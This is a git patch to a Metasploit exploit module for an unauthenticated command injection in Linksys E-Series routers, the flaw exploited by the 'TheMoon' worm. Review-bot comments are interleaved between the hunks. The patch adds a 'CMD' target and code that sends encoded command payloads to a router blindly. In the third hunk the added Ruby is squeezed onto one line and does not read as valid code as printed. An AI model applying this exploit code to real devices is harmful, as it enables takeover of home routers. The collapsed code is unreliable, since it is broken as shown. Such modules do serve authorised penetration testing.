From 2935f4f5627a251ba6a24fb535323eadc56ce223 Mon Sep 17 00:00:00 2001
From: Michael Messner
Date: Mon, 24 Feb 2014 18:12:23 +0100
Subject: [PATCH] CMD target
---
 .../linux/http/linksys_themoon_exec_echo.rb | 27 +++++++++++++++++--
 1 file changed, 25 insertions(+), 2 deletions(-)
diff --git a/modules/exploits/linux/http/linksys_themoon_exec_echo.rb b/modules/exploits/linux/http/linksys_themoon_exec_echo.rb
index cedc9e5b44..33261f342c 100644
--- a/modules/exploits/linux/http/linksys_themoon_exec_echo.rb
+++ b/modules/exploits/linux/http/linksys_themoon_exec_echo.rb
@@ -16,8 +16,11 @@ class Metasploit3 < Msf::Exploit::Remote
 'Name' => 'Linksys E-Series TheMoon Remote Command Injection',
 'Description' => %q{
 Some Linksys E-Series Routers are vulnerable to an unauthenticated OS command
- injection. This vulnerability was used from the so called "TheMoon" worm. There
- are many Systems that might be vulnerable:
+ injection. Since it is a blind os command injection vulnerability, there is no
+ output for the executed command when using the cmd generic payload. A ping
+ command against a controlled system could be used for testing purposes. This
+ vulnerability was used from the so called "TheMoon" worm. There are many Systems
+ that might be vulnerable:
 E4200, E3200, E3000, E2500, E2100L, E2000, E1550, E1500, E1200, E1000, E900.
 This module was tested against a E1500 v1.0.5.
 },
@@ -46,6 +49,12 @@ class Metasploit3 < Msf::Exploit::Remote
 },
 'Targets' => [
+ [ 'CMD', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ],
 [ 'Linux mipsel Payload',
 {
 'Arch' => ARCH_MIPSLE,
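Review bot: The rewritten description changes case mid-thought — the context line above says `OS command` while the first added line says `blind os command injection` — and the retained phrase `was used from the so called "TheMoon" worm` reads awkwardly. Suggested wording for those two spots: `blind OS command injection` and `was used by the so-called "TheMoon" worm`. This is a user-facing module string, so the fix is purely textual and changes no behaviour.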
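Review bot: The new `CMD` target declares only `Arch` and `Platform`, so every cmd/unix payload stays selectable for it and the mismatch is only detected at run time by the `datastore['CMD']` heuristic added in the third hunk. Declaring the compatibility on the target itself, `'Payload' => { 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic' } }`, lets the framework restrict the payload list to the generic command payload before the exploit runs and makes the later datastore check unnecessary. The three trailing context lines belong to the existing mipsel target and are unchanged.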
@@ -107,6 +116,20 @@ class Metasploit3 < Msf::Exploit::Remote
 fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
 end
+ if target.name =~ /CMD/ if not (datastore['CMD']) fail_with(Failure::BadConfig, "#{peer} - Only the cmd/generic payload is compatible") end cmd = payload.encoded res = execute_command(cmd,"0") if (!res) fail_with(Failure::Unknown, "#{peer} - Unable to execute payload") else print_status("#{peer} - Blind Exploitation - unknown Exploitation state") end return end
+
 execute_cmdstager(
 :linemax => 26
 )
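Review bot: `if not (datastore['CMD'])` on the second added line tests a datastore option rather than the selected payload, so a `CMD` value left over from an earlier payload choice may let a non-generic cmd payload pass this guard; checking `payload` or constraining the target's compat metadata would be more reliable. Stylistically, `if not (...)` and `if (!res)` are non-idiomatic Ruby — prefer `unless datastore['CMD']` and `unless res` — and `execute_command(cmd,"0")` is missing the space after the comma. The status text `Blind Exploitation - unknown Exploitation state` could say what actually happened, e.g. `print_status("#{peer} - Blind injection: command sent, result cannot be verified")`. The enclosing method begins and ends outside this hunk.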